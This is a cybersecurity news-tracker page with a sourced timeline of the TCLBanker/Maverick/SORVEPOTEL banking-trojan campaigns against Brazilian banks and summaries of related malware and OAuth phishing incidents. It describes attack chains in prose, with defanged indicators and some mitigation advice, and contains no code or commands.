CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

TCLBanker Evolution: Water Saci Expands WhatsApp/Outlook Campaign Targeting 59 Brazilian Banks and Fintech Platforms

First reported
Last updated
3 unique sources, 6 articles

Summary

Hide ▲

A new trojan named TCLBanker, which targets 59 banking, fintech, and cryptocurrency platforms, has emerged as a major evolution of the older Maverick/SORVEPOTEL malware family. The malware spreads via WhatsApp and Outlook using self-spreading worm modules that automatically infect new victims, primarily in Brazil, but with potential for regional expansion. TCLBanker is loaded via DLL side-loading within a legitimate Logitech application, avoiding detection by security products. The banking module monitors browser activity in real-time, enabling remote control operations including live screen streaming, keylogging, and clipboard hijacking, while using sophisticated overlay systems to harvest credentials and financial data. The malware's WhatsApp worm module hijacks authenticated sessions to harvest contacts and send spam messages, while the Outlook worm module abuses COM automation to distribute phishing emails. The threat actor behind TCLBanker, identified as Water Saci, has incorporated advanced evasion techniques and may have used AI tools during development, further refining its capabilities beyond earlier iterations like SORVEPOTEL and Maverick.

Timeline

  1. 03.12.2025 17:32 2 articles · 5mo ago

    Water Saci Uses Sophisticated Infection Chain to Deploy Banking Trojan

    The threat actor Water Saci is using a sophisticated, highly layered infection chain that uses HTML Application (HTA) files and PDFs to propagate a worm that deploys a banking trojan via WhatsApp in attacks targeting users in Brazil. The latest wave is characterized by the attackers shifting from PowerShell to a Python-based variant that spreads the malware in a worm-like manner over WhatsApp Web. The PDF lure instructs victims to update Adobe Reader by clicking on an embedded link. Users who receive HTA files are deceived into executing a Visual Basic Script immediately upon opening, which then runs PowerShell commands to fetch next-stage payloads from a remote server, an MSI installer for the trojan and a Python script that's responsible for spreading the malware via WhatsApp Web. The MSI installer serves as a conduit for delivering the banking trojan using an AutoIt script. The script also runs checks to ensure that only one instance of the trojan is running at any given point of time. The script verifies the presence of a marker file named "executed.dat." If it does not exist, the script creates the file and notifies an attacker-controlled server ("manoelimoveiscaioba[.]com"). The script analyzes the user's Google Chrome browsing history to search visits to banking websites, specifically a hard-coded list comprising Santander, Banco do Brasil, Caixa Econômica Federal, Sicredi, and Bradesco. The script then proceeds to another critical reconnaissance step that involves checking for installed antivirus and security software, as well as harvesting detailed system metadata. The main functionality of the malware is to monitor open windows and extract their window titles to compare them against a list of banks, payment platforms, exchanges, and cryptocurrency wallets. If any of these windows contain keywords related to targeted entities, the script looks for a TDA file dropped by the installer and decrypts and injects it into a hollowed "svchost.exe" process, following which the loader searches for an additional DMP file containing the banking trojan. The banking trojan deployed is not Maverick, but rather a malware that exhibits structural and behavioral continuity with Casbaneiro. The trojan carries out "aggressive" anti-virtualization checks to sidestep analysis and detection, and gathers host information through Windows Management Instrumentation (WMI) queries. The trojan makes Registry modifications to set up persistence and establishes contact with a C2 server ("serverseistemasatu[.]com") to send the collected details and receive backdoor commands that grant remote control over the infected system. The trojan forcibly terminates several browsers to force victims to reopen banking sites under "attacker-controlled conditions." The second aspect of the campaign is the use of a Python script, an enhanced version of its PowerShell predecessor, to enable malware delivery to every contact via WhatsApp Web sessions using the Selenium browser automation tool. There is "compelling" evidence to suggest that Water Saci may have used a large language model (LLMs) or code-translation tool to port their propagation script from PowerShell to Python, given the functional similarities between the two versions and the inclusion of emojis in console outputs. TCLBanker represents a further evolution in Water Saci's capabilities, incorporating the actor's signature infection techniques while introducing new propagation vectors (Outlook) and significantly enhanced remote control features. The malware's advanced evasion techniques, including environment-dependent payload decryption and persistent watchdog threads against analysis tools, demonstrate the continuing refinement of the threat actor's toolkit.

    Show sources
    Open in new tab
  2. 03.12.2025 17:32 2 articles · 5mo ago

    RelayNFC Android Malware Targets Brazilian Banking Users

    The development comes as Brazilian banking users are also being targeted by a previously undocumented Android malware dubbed RelayNFC that's designed to carry out Near-Field Communication (NFC) relay attacks and siphon contactless payment data. RelayNFC implements a full real-time APDU relay channel, allowing attackers to complete transactions as though the victim's card were physically present. The malware is built using React Native and Hermes bytecode, which complicates static analysis and helps evade detection. Primarily spread via phishing, the attack makes use of decoy Portuguese-language sites (e.g., "maisseguraca[.]site") to trick users into installing the malware under the pretext of securing their payment cards. The end goal of the campaign is to capture the victim's card details and relay them to attackers, who can then perform fraudulent transactions using the stolen data. The cybersecurity company said its investigation also uncovered a separate phishing site ("test.ikotech[.]online") that distributes an APK file with a partial implementation of Host Card Emulation (HCE), indicating that the threat actors are experimenting with different NFC relay techniques.

    Show sources
    Open in new tab
  3. 19.11.2025 17:00 4 articles · 5mo ago

    Eternidade Stealer Trojan Targets Brazilian Financial Institutions

    The campaign leverages a combination of social engineering and WhatsApp hijacking to distribute the trojan, using an obfuscated Visual Basic Script to drop a batch script that delivers two payloads: a Python script for WhatsApp Web-based dissemination and an MSI installer for Eternidade Stealer. The Python script establishes communication with a remote server and uses WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp. The malware harvests a victim's entire contact list, filters out groups, business contacts, and broadcast lists, and sends a malicious attachment to all contacts. The MSI installer drops several payloads, including an AutoIt script that checks if the compromised system is based in Brazil by inspecting the operating system language. The script scans running processes and registry keys to ascertain the presence of installed security products and profiles the machine, sending details to a C2 server. The malware injects the Eternidade Stealer payload into 'svchost.exe' using process hollowing. Eternidade Stealer continuously scans active windows and running processes for strings related to banking portals, payment services, and cryptocurrency exchanges and wallets. The malware uses a terra.com[.]br email address to fetch C2 details, mirroring a tactic recently adopted by Water Saci. The campaign's backend was traced to two panels, one for managing the Redirector System and another login panel, used to monitor infected hosts. TCLBanker incorporates similar WhatsApp hijacking techniques but expands the propagation vectors to include Outlook via COM automation, representing an evolution in the campaign's delivery mechanisms while maintaining the focus on Brazilian financial targets.

    Show sources
    Open in new tab
  4. 11.11.2025 20:37 4 articles · 5mo ago

    SORVEPOTEL Linked to Maverick Banking Malware

    New findings reveal that SORVEPOTEL is linked to a banking malware called Maverick, which targets Brazilian banks and monitors active browser window tabs for URLs matching financial institutions. The malware uses IMAP connections to terra.com[.]br email accounts using hardcoded email credentials to retrieve commands and implements a sophisticated remote control mechanism that allows the adversary to pause, resume, and monitor the WhatsApp propagation in real-time. TCLBanker represents a major evolution of the Maverick/SORVEPOTEL malware family, incorporating advanced features while maintaining the core targeting of Brazilian financial institutions. The malware expands the banking module to 59 targeted platforms and introduces sophisticated remote control capabilities including live screen streaming, keylogging, and clipboard hijacking. The malware's development shows signs of AI-assisted coding, with researchers noting code artifacts suggesting AI involvement in creating the loader and propagation modules.

    Show sources
    Open in new tab
  5. 03.10.2025 15:02 5 articles · 7mo ago

    SORVEPOTEL Malware Spreads via WhatsApp in Brazil

    The malware spreads through phishing messages with malicious ZIP file attachments on WhatsApp, primarily affecting Windows systems. The campaign is designed for rapid propagation rather than data theft or ransomware. The malware exploits trust in WhatsApp to spread across contacts and groups, leading to account bans for excessive spam. The majority of infections are concentrated in Brazil, impacting various sectors including government, public service, and technology. New developments introduce TCLBanker, a significantly evolved malware that builds upon the SORVEPOTEL foundation. TCLBanker targets 59 banking, fintech, and cryptocurrency platforms via a trojanized MSI installer for Logitech AI Prompt Builder. The installer uses DLL side-loading within a legitimate Logitech application to evade detection while executing malicious payloads. The malware introduces autonomous self-spreading capabilities through WhatsApp and Outlook, including session hijacking, contact harvesting, and phishing email distribution. The WhatsApp worm module exploits authenticated Web sessions to send spam messages to Brazilian contacts, while the Outlook worm module abuses COM automation to distribute malicious emails.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

WhatsApp-delivered VBS malware abuses UAC bypass for persistent Windows compromise via cloud-hosted MSI payloads

A malware campaign observed since late February 2026 delivers malicious Visual Basic Script (VBS) files to Windows users via WhatsApp, executing multi-stage attacks to establish persistence and enable remote access. The attack chain uses renamed legitimate Windows utilities (e.g., curl.exe → netapi.dll, bitsadmin.exe → sc.exe) to evade detection, retrieves payloads from trusted cloud services (AWS S3, Tencent Cloud, Backblaze B2), and installs unsigned MSI packages. The malware weakens User Account Control (UAC) defenses by repeatedly attempting elevated cmd.exe execution, modifying registry keys under HKLM\Software\Microsoft\Win, and embedding persistence to survive reboots. This enables privilege escalation without user interaction and deployment of remote access tools like AnyDesk, facilitating data theft and secondary malware delivery.

Open in new tab

DeepLoad malware campaign leverages AI-generated obfuscation and ClickFix for persistent credential theft

A malicious campaign named DeepLoad is actively targeting enterprise networks to steal user credentials and maintain persistent access. The malware combines social engineering via ClickFix to trick users into executing PowerShell commands through the Windows Run dialog, leveraging compromised websites or SEO-poisoned search results for delivery. DeepLoad hides its functional payload within layers of AI-generated obfuscation code within meaningless variable assignments, evading file-based detection. It leverages Windows lock screen processes via 'LockAppHost.exe' and abuses Windows Management Instrumentation (WMI) to achieve persistence, automatically re-infecting systems three days after initial removal without additional user or attacker action. The campaign spreads via USB drives within minutes of infection, deploying decoy shortcut files such as 'ChromeSetup.lnk' and 'Firefox Installer.lnk' to enable lateral movement. DeepLoad deploys a standalone credential stealer ('filemanager.exe') that exfiltrates stored browser passwords and a malicious browser extension to intercept real-time keystrokes during login sessions. Impact includes unauthorized access to enterprise accounts, potential data exfiltration, and sustained foothold in compromised networks despite apparent cleanup efforts.

Open in new tab

PluggyApe Backdoor Targets Ukraine's Defense Forces in Charity-Themed Campaign

Ukraine's Defense Forces were targeted in a charity-themed malware campaign between October and December 2025, delivering the PluggyApe backdoor, likely deployed by the Russian threat group Void Blizzard (Laundry Bear). The attacks began with instant messages over Signal or WhatsApp, directing recipients to malicious websites posing as charitable foundations. These sites distributed password-protected archives containing PluggyApe payloads. The malware profiles the host, sends victim information to attackers, and waits for further commands. In February 2026, a new campaign targeting Ukrainian entities was observed, employing judicial and charity-themed lures to deploy a JavaScript-based backdoor codenamed DRILLAPP. This campaign is likely orchestrated by threat actors linked to Russia and shares overlaps with the prior PluggyApe campaign. The malware is capable of uploading and downloading files, leveraging the microphone, and capturing images through the webcam. The threat actor is believed to be active since at least April 2024.

Open in new tab

Malicious npm package 'lotusbail' steals WhatsApp credentials and messages

A malicious npm package named 'lotusbail' has been discovered, which poses as a legitimate WhatsApp Web API library. The package steals WhatsApp authentication tokens, session keys, intercepts messages, and exfiltrates contact lists and media files. It has been available for at least six months with over 56,000 downloads. The package also links the attacker's device to the victim's WhatsApp account, granting persistent access even after removal. Researchers recommend checking for rogue linked devices and monitoring runtime behavior for unexpected outbound connections. The package was uploaded by a user named 'seiren_primrose' in May 2025 and has been downloaded 711 times in the last week. It uses a malicious WebSocket wrapper to capture credentials and chats, and the stolen data is transmitted to an attacker-controlled URL in encrypted form. The package also uses a hard-coded pairing code to hijack the device linking process and enters into an infinite loop trap when debugging tools are detected.

Open in new tab

OAuth Device Code Phishing Campaigns Target Microsoft 365 Accounts

A surge in phishing campaigns exploiting Microsoft’s OAuth device code authorization flow has been observed, targeting Microsoft 365 accounts. Both state-aligned and financially motivated actors are using social engineering to trick users into approving malicious applications, leading to account takeover and data theft. The attacks leverage the OAuth 2.0 device authorization grant, a legitimate process designed for devices with limited input capabilities. Once victims enter a device code generated by an attacker-controlled application, the threat actor receives a valid access token, granting control over the compromised account. The campaigns use QR codes, embedded buttons, and hyperlinked text to initiate the attack chain, often claiming to involve document sharing, token reauthorization, or security verification. The growth of these campaigns is linked to readily available phishing tools like SquarePhish2 and Graphish, which simplify device code abuse and require limited technical skill. Proofpoint observed financially motivated actor TA2723 and Russia-linked group UNK_AcademicFlare adopting this technique, targeting various sectors in the US and Europe. Microsoft recently warned of phishing campaigns using OAuth URL redirection mechanisms to bypass conventional phishing defenses. These campaigns target government and public-sector organizations, redirecting victims to attacker-controlled infrastructure without stealing their tokens. Attackers abuse OAuth's standard behavior by crafting URLs with manipulated parameters or associated malicious applications to redirect users to malicious destinations. The attack starts with a malicious application created by the threat actor, configured with a redirect URL pointing to a rogue domain hosting malware. The malicious payloads are distributed as ZIP archives, leading to PowerShell execution, DLL side-loading, and pre-ransom or hands-on-keyboard activity. The activity, ongoing since September 2025, is being tracked by Proofpoint under the moniker UNK_AcademicFlare. The attacks involve using compromised email addresses belonging to government and military organizations to strike entities within government, think tanks, higher education, and transportation sectors in the U.S. and Europe. The adversary claims to share a link to a document that includes questions or topics for the email recipient to review before the meeting. The URL points to a Cloudflare Worker URL that mimics the compromised sender's Microsoft OneDrive account and instructs the victim to copy the provided code and click 'Next' to access the supposed document. Device code phishing was documented in detail by both Microsoft and Volexity in February 2025, attributing the use of the attack method to Russia-aligned clusters such as Storm-2372, APT29, UTA0304, and UTA0307. The October 2025 campaign is assessed to have been fueled by the ready availability of crimeware offerings like the Graphish phishing kit and red-team tools such as SquarePhish. To counter the risk posed by device code phishing, the best option is to create a Conditional Access policy using the Authentication Flows condition to block device code flow for all users. If that's not feasible, it's advised to use a policy that uses an allow-list approach to allow device code authentication for approved users, operating systems, or IP ranges. Threat actors are now targeting technology, manufacturing, and financial organizations in campaigns that combine device code phishing and voice phishing (vishing) to abuse the OAuth 2.0 Device Authorization flow and compromise Microsoft Entra accounts. Unlike previous attacks that utilized malicious OAuth applications to compromise accounts, these campaigns instead leverage legitimate Microsoft OAuth client IDs and the device authorization flow to trick victims into authenticating. This provides attackers with valid authentication tokens that can be used to access the victim's account without relying on regular phishing sites that steal passwords or intercept multi-factor authentication codes. Hackers are abusing the legitimate OAuth redirection mechanism to bypass phishing protections in email and browsers to take users to malicious pages. The attacks target government and public-sector organizations with phishing links that prompt users to authenticate to a malicious application. The malicious OAuth applications are registered with an identity provider, such as Microsoft Entra ID, and leverage the OAuth 2.0 protocol to obtain delegated or application-level access to user data and resources. The attackers create malicious OAuth applications in a tenant they control and configure them with a redirect URI pointing to their infrastructure. The researchers say that even if the URLs for Entra ID look like legitimate authorization requests, the endpoint is invoked with parameters for silent authentication without an interactive login and an invalid scope that triggers authentication errors. This forces the identity provider to redirect users to the redirect URI configured by the attacker. In some cases, the victims are redirected to phishing pages powered by attacker-in-the-middle frameworks such as EvilProxy, which can intercept valid session cookies to bypass multi-factor authentication (MFA) protections. Microsoft found that the 'state' parameter was misused to auto-fill the victim’s email address in the credentials box on the phishing page, increasing the perceived sense of legitimacy. In other instances, the victims are redirected to a 'download' path that automatically delivers a ZIP file with malicious shortcut (.LNK) files and HTML smuggling tools. Opening the .LNK launches PowerShell, which performs reconnaissance on the compromised host and extracts the components required for the next step, DLL side-loading. A malicious DLL (crashhandler.dll) decrypts and loads the final payload (crashlog.dat) into memory, while a legitimate executable (stream_monitor.exe) loads a decoy to distract the victim. Microsoft suggests that organizations should tighten permissions for OAuth applications, enforce strong identity protections and Conditional Access policies, and use cross-domain detection across email, identity, and endpoints.

Open in new tab